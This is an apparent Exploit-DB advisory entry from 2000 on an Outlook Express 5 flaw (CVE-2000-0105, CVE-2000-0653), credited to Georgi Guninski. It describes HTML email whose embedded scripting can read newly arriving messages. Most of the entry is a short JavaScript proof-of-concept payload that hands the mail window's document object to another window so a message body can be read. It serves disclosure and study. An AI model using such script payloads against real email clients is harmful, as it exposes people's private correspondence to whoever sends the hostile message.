Microsoft Outlook Express 5 Javascript Email Access Vulnerability

2000-02-01T00:00:00
ID EDB-ID:19738
Type exploitdb
Reporter Georgi Guninski
Modified 2000-02-01T00:00:00

Description

MS Outlook Express 5 Javascript Email Access Vulnerability. CVE-2000-0105,CVE-2000-0653. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/962/info

Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. 

Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>